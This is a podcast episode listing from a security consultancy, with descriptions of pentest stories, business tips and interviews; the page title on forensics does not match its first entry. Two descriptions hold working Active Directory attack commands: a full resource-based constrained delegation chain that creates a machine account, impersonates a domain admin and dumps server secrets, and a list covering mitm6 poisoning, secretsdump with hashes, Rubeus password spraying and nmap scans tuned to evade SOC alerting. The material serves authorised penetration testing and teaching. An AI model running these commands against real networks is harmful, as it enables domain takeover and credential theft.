7MS #356: Faster Hard Drive Forensics with CyLR and CDQR

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

20 Maj 202257min

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're using Intercom to publish self-help/FAQ articles for 7MS.

13 Maj 202248min

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review: BloodHound edges DACL Trouble: Generic All on OUs AD prep bug in Windows Server 2016

7 Maj 202246min

Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include: Can you tell us more about your infosec superhero origin story and creation of your book? Will there ever be a new version of the Defensive Security Handbook? What blue team certs/YouTube vids/classes/conferences give the best bang for your buck? Was it a mistake to invent computers? From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)? You can wave a magic wand and solve any three security challenges instantly - what do you choose? Infosec Twitter drama. Love it? Leave it? Something inbetween? Tips to prevent business email compromise? How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web? Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)

27 Apr 202257min

Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover: Auto installing Splashtop This can be done automatically by downloading your splashtop.exe install and issuing this command: splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2 Auto installing Ninite This can be done in a batch script like so: agent.msi /quiet ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt Auto installing Uptimerobot monitoring We do this by first creating a script called c:\uptimerobot.ps1 that makes the "phone home" call to UptimeRobot: Start-Transcript -Path c:\heartbeat.log -Append Invoke-Webrequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing Stop-Transcript Then we install the scheduled task itself like so: schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:\uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM"

22 Apr 202246min

In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.

14 Apr 202245min

Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago. In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.

6 Apr 202235min

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include: I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error! Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold! LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

30 Mars 202250min